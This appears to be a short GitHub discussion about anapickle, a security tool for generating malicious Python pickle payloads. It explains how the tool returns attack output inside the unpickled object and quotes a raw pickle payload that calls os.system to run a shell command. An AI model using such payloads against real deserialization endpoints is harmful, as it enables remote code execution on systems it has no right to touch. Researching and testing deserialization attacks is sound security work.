anapickle
anapickle copied to clipboard
sensepost
easier way to compile arbitrary python file into pickle objects
That method is useful, but suffers from the same fundamental problem as "cos\nsystem\n(S'ls ~'\ntR.", which is that the results of the expression are not inserted into the object returned by pickle.loads(). Anapickle takes a more generic approach, and can produces pickles where the attacker's code places its results directly inside the reconstructed object, meaning that if any fields from the object are displayed to the user, they can see the output from their attack. This is a similar distinction to in-page results for SQL injection as compared to blind SQL injection; an attack occurs in both instances but one is significantly easier to use as an attacker.
Incidentally, anapickle includes a module for running arbitrary Python code, so that angle is covered too, see the 'gen_eval' shellcode module.
